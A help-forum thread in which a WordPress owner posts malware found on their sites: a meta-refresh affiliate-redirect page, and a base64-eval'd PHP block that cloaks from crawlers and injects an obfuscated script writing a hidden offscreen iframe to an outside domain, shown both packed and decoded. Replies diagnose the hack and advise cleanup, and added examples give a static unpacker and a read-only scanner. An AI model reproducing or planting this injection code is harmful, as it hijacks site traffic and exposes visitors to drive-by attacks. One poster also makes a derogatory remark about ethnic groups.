Can someone tell me what this file is doing?

I know a bit of PHP, but not much; mostly just HTML and CSS. I have been having security issues with a number of my WordPress sites and have come across a few things that I am not used to seeing in a WordPress root.

I came across a file in one site called ‘indextools.php’ containing the code:

<html>
<head>
<meta http-equiv="refresh" content="0;URL=https://*********" />
</head>
<?php if (preg_match('/^Mozilla\\/.*?\\(compatible; MSIE (8|7|6|5)\\..*?\\)/', $_SERVER['HTTP_USER_AGENT'])) : ?>
<script type="text/javascript">
window.self.location.replace('https://*********');
</script>
<?php endif; ?>
<body>
</body>
</html>

The URLs, starred out, are both websites that do not belong to me. In fact, they are for an affiliate program (to a company that I work with), but the affiliate ID is not mine, nor do I have one with this company…

My question is, quite simply, what is the code doing and could it be working against me.

I would say ABSOLUTELY this is performing an undesirable operation. It is redirecting any/all traffic landing on this page to those other URLs.

I decoded this encrypted (base64) piece of code, which was at the top of index.php:


error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
	echo("<script type=\\"text/javascript\\">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\134w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\134b'+e(c)+'\\134\\142','\\147'),k[c]);return p;}('Q\\x20\\x39=P \\x53\\50)\\73\\71.R\\509\\x2EO\\x28\\51\\53\\61\\51\\73\\x6A\\50\\x4C.\\113\\46\\46d\\x2E\\164\\56N\\x28\\'\\\\M\\134\\x73\\\\T\\\\\\172\\x5C\\x38\\47)\\x3D\\75\\x2D\\61){d\\56\\610\\x28\\47\\x3Cj\\x5C\\x5A\\x5C\\x37\\\\\\x31\\x32\\\\\\141\\x5C\\611\\x5C\\162\\x3D\\134\\x65\\'+\\62.6\\50\\x32\\x2E\\65\\50\\51*\\63\\x2B\\63\\51+\\x27\\x5C\\x65\\\\\\x66\\x5C\\x59\\\\\\126\\134\\125\\134\\x76\\x5C8\\\\\\147\\'\\53\\62\\566\\50\\62\\565\\x28\\51*3\\53\\63\\x29+\\'\\\\\\x22\\x5C\\130\\134W\\134\\x43\\134\\x41\\134u\\x5C\\x42\\\\7\\\\u\\134\\x38\\x5C\\x22\\x30\\\\\\"\\134\\146\\\\\\142\\1344\\x5C\\x48\\\\\\67\\x5C\\x38\\x5C\\147\\134\\157\\134\\155\\\\I\\\\4\\\\\\141\\134\\155\\134\\x63\\134\\153\\x5C\\160\\\\\\x4A\\134b\\134\\104\\\\\\x45\\\\\\106\\\\\\x47\\x5C\\61\\154\\\\7\\134\\x31\\157\\x5Ck-\\47\\x2B2\\566\\x282\\x2E\\x35\\x28\\x29*\\63+\\x6C)+\\47\\x31\\156\\\\\\61\\161\\x5Cv\\\\\\x41\\x5Ch:\\134\\x31\\160\\x27+\\62\\x2E\\66\\502.5\\x28)\\52\\x33\\53l\\x29\\x2B\\x27\\1341k\\134\\145\\134\\146\\134b\\134\\156\\x5C1\\152\\\\w\\x5C1\\155\\x5C4\\1344\\134\\157:\\134\\x31\\x76/x\\\\\\x68\\134\\61\\x75\\134\\x71\\\\1\\x72\\\\\\61s\\\\\\61t\\x5C\\143\\\\\\x61\\\\\\x63\\\\4\\134\\162\\\\\\61\\151\\\\\\x61\\\\\\61\\67\\x2Fi\\x5C\\161\\134\\x31\\70\\134\\61\\71\\56\\\\h\\x5C1\\66?\\x5C\\x31\\x33\\\\\\x314\\x5C\\147\\x5C\\x31\\x35\\x3C\\\\1a\\134\\x31\\146\\x5C\\160\\x5C\\171\\x5C\\67\\\\\\61g\\'\\51\\x3B\\x64\\56\\164\\75\\47\\61h\\x5Cs\\134y\\134z\\\\w\\x27\\x2B\\62\\56\\x36\\x28\\62\\565\\x28\\51\\52\\61e\\x29\\53\\'; 
\\71\\134\\x31b\\\\\\x6E\\x5C1\\x63\\134\\142\\134\\x38\\x27\\x2B\\x39.\\x31\\x64\\x28)\\175',62,94,'\\174\\x7CMa\\164\\x68\\x7C\\61\\60\\60\\x7C164\\174\\x72\\141\\x6E\\144\\x6F\\x6D|\\x66\\154oo\\x72\\x7C1\\x34\\65\\174x3\\104|ex\\x70|\\x31\\x35\\61|1\\x363|\\61\\65\\66\\174\\x64\\x6Fc\\165me\\156\\x74|x\\x32\\x32\\174\\17020|\\642\\174\\61\\66\\60\\174|i\\146\\17472\\x7C2\\600\\x7C\\x31\\657\\174\\616\\62|\\x7870|\\x31\\x341\\174\\170\\66E\\174\\61\\x350\\x7C\\61\\x365\\x7C\\143\\x6F\\x6F\\153\\151\\x65\\x7Cx72|\\x787\\x34\\x7C\\675\\174\\x7C\\x31\\655\\x7C\\x78\\x374\\x64\\174\\170\\x36\\106\\x7C\\17064|\\x31\\x34\\x35\\142\\174\\61\\65\\67\\x6C\\x7C\\17075\\x7C\\x31\\664\\145\\x7C\\x78\\63\\102|\\x31\\67\\x31\\x6C\\1741\\66\\63\\151\\x7C\\x314\\x32\\x7C\\x63\\x6F\\157\\x6B\\x69eE\\x6E\\x61\\142\\x6Ce\\144\\x7Cn\\x61\\x76i\\147ator\\x7C1\\63\\x37\\137\\174\\x69\\156de\\x78\\117f\\x7Cge\\x74Dat\\145|\\x6Ee\\x77\\174v\\141r\\x7Cs\\x65t\\x44\\x61\\x74\\145\\174\\x44\\x61\\164e|\\170\\x36\\x44\\174x\\x36\\67h|\\170\\66\\x35\\x69\\x7C\\x31\\64\\61\\155\\174\\x78\\62\\60f\\x72\\174x\\x36\\x38\\174\\170\\672\\141\\155\\x7C\\167\\162\\151t\\x65|1\\64\\x34t|40\\x77\\174\\x78\\667\\x6F\\x7C751|\\67\\66\\x7C1\\x350\\x70\\174\\x78\\67\\x41|\\61\\x34\\x34\\x7C\\x31\\64\\65x\\174x\\x32\\106i\\x7C\\17069|\\x78\\66\\65\\174t\\x6F\\x55T\\x43S\\x74r\\x69\\x6E\\147\\x7C\\x399\\71999\\x39\\174x\\66\\x36\\x72\\174x3\\x45\\x7C__\\174\\x782E\\142\\174\\x786\\x33\\x7C\\x78\\x37\\60x\\174\\170\\x36\\x43|42\\x68\\174\\160\\x78|\\1706\\x36t|\\1702D|7\\x33|\\170\\x37\\67|\\61\\x36\\61\\x6E\\x7C\\x782E\\1741\\x361|\\x78\\x32\\x46'.split('\\174'),0,{}))=')."</script>");

Can anyone shed any light on what this is? I’ve never seen encrypted php in index.php of a wordpress site…

It’s not encrypted… just encoded and obfuscated.

It’s malicious code that has been injected into your site–you’ve been hacked. I highly recommend restoring your site from a backup.

If your backups don’t go far enough back, I’d recommend taking note of your plugins and customizations, deleting the WordPress files, and setting it up again. There’s no telling where else the malicious code may reside. For good measure, you should change all of your passwords (both in WordPress and the password for your host’s control panel). I’d also explore the database for anything looking malicious.

I was afraid of that. The problem is, there’s about 50 sites that could be affected, 10 or so that I know for sure. On top of that, before I was hired, the people I work for used some skeevy Indians and I believe Russians, which, later on, they believed to have been stealing from them, but don’t know how. I’ve come across many strange things over a period of time, but there’s simply too much to dig through thousands and thousands of lines of code. Think I’m just going to suggest a complete rebuild.

I wouldn’t suggest a rebuild, I would demand it…

I don’t think that’s really relevant. I’ve seen this type of code injection happen on insecure servers, poor permissions settings, and/or installations of wordpress that weren’t locked down. Because wordpress is widely used, it tends to be a target for hackers and script kiddies unless you secure your server and your installation of wordpress properly.

Follow up question:

Here is the full index.php file

<?php eval(base64_decode('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'));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Which, as mentioned, was encoded and obfuscated, and comes out to be something like this:

<?php
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
	echo("<script type=\\"text/javascript\\">" 
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\x5C\\167+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','\\147'),k[c]);return p;}(
var exp = new Date();
exp.setDate(exp.getDate() + 1);
if (navigator.cookieEnabled && document.cookie.indexOf('__umtd=') == -1) {
        document.write('<iframe '
                + 'width="' + Math.floor(Math.random() * 100 + 100) + '" '
                + 'height="' + Math.floor(Math.random() * 100 + 100) + '" '
                + 'frameborder="0" '
                + 'style="position:absolute;'
                        + 'left:-' + Math.floor(Math.random() * 100 + 200) + 'px;'
                        + 'top:-' + Math.floor(Math.random() * 100 + 200) + 'px" '
                + 'src="http://xpqnwqn.ninth.biz/index.php?go=1"></iframe>');
        document.cookie = '__umtd=' + Math.floor(Math.random() * 9999999) + '; '
                + 'expires=' + exp.toUTCString()
}       ')."</script>");
}

If I removed the code from the index.php file yesterday, and it is already back today, what assumption(s) can I make about it? My thought is that I’m going to find it when I get into the database. Is there anything else I should check?

I also found this link which has the same code - though I do not know what it means.
https://gist.github.com/1377065
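An added example, not part of any post in this thread: a static unpacker for the `eval(function(p,a,c,k,e,d){…})` wrapper seen in the decoded index.php, which recovers the script text without ever running it. It also resolves the `\xHH` and octal escapes used inside the string arguments; the sample input is constructed and harmless, and `unpack`, `js_unescape` and `encode` are names chosen here.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"
SIMPLE = {"n": "\n", "t": "\t", "r": "\r"}
STR = r"'((?:[^'\\]|\\.)*)'"  # one single-quoted JS string literal
PACKED = re.compile(r"\}\(\s*" + STR + r"\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
                    + STR + r"\.split\(" + STR + r"\)", re.S)

def js_unescape(s):
    """Resolve hex, octal and simple backslash escapes as a JS parser would."""
    def sub(m):
        hx, oc, ch = m.groups()
        if hx: return chr(int(hx, 16))
        if oc: return chr(int(oc, 8))
        return SIMPLE.get(ch, ch)
    pattern = r"\\(?:x([0-9A-Fa-f]{2})|([0-3][0-7]{2}|[0-7]{1,2})|(.))"
    return re.sub(pattern, sub, s, flags=re.S)

def encode(c, a):
    """The packer's e(c): word index -> base-a token (0-9, a-z, then A-Z)."""
    head = "" if c < a else encode(c // a, a)
    c %= a
    return head + (chr(c + 29) if c > 35 else DIGITS[c])

def unpack(source):
    """Return the unpacked script as text, or None if no packer call is found."""
    m = PACKED.search(source)
    if not m:
        return None
    p, a, count = js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    words = js_unescape(m.group(4)).split(js_unescape(m.group(5)))
    table = {}
    for c in range(count):
        key = encode(c, a)
        # An empty dictionary slot means the token stands for itself.
        table[key] = words[c] if c < len(words) and words[c] else key
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)),
                  p, flags=re.A)

# Constructed, harmless sample in the same shape as the blob in the thread.
SAMPLE = (r"eval(function(p,a,c,k,e,d){/* body omitted */}('0.1=\'2 3\';',62,4,"
          r"'docu\x6Dent\174title\174\174page'.split('\174'),0,{}))")

if __name__ == "__main__":
    print(unpack(SAMPLE))
```

String literals inside the unpacked text can carry a further layer of escapes, so running `js_unescape` on them again is often needed before the result is readable.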

We have been hacked in exactly the same way. Have you had any success so far that you can share?

I ended up finding a single backdoor in a file called “google345ffe…”, removed all malicious code from the sites affected, and haven’t had problems since. Thank you all for your help!
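An added example, not from any poster: a read-only triage scan for the two patterns shown in this thread, an `eval(base64_decode(...))` call in a PHP file and a meta-refresh redirect page like indextools.php. It decodes the payload only to look for markers and never executes it; the function names and marker list are assumptions chosen here, and hits are leads for manual review rather than verdicts.

```python
import base64, binascii, os, re

EVAL_B64 = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
REDIRECT = re.compile(rb"http-equiv=[\"']refresh[\"'][^>]*URL=https?://", re.I)
# Strings that appear in the decoded payload posted in this thread.
MARKERS = (b"HTTP_USER_AGENT", b"<iframe", b"document.write",
           b"eval(function(p,a,c,k,e,d)")

def inspect_bytes(data):
    """Return findings for one file's bytes as (kind, offset, markers) tuples."""
    findings = []
    for m in EVAL_B64.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1))
        except (binascii.Error, ValueError):
            decoded = b""  # malformed payload: still report the eval itself
        hits = [k.decode() for k in MARKERS if k in decoded]
        findings.append(("eval-base64", m.start(), hits))
    r = REDIRECT.search(data)
    if r:
        findings.append(("redirect", r.start(), []))
    return findings

def scan(root):
    """Walk root and map each flagged PHP file (path relative to root) to findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    found = inspect_bytes(fh.read())
                if found:
                    report[os.path.relpath(path, root)] = found
    return report

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(scan(target).items()):
        print(path, found)
```

Because the injection in this thread reappeared a day after removal, a scan like this is worth re-running after cleanup and comparing against the previous report.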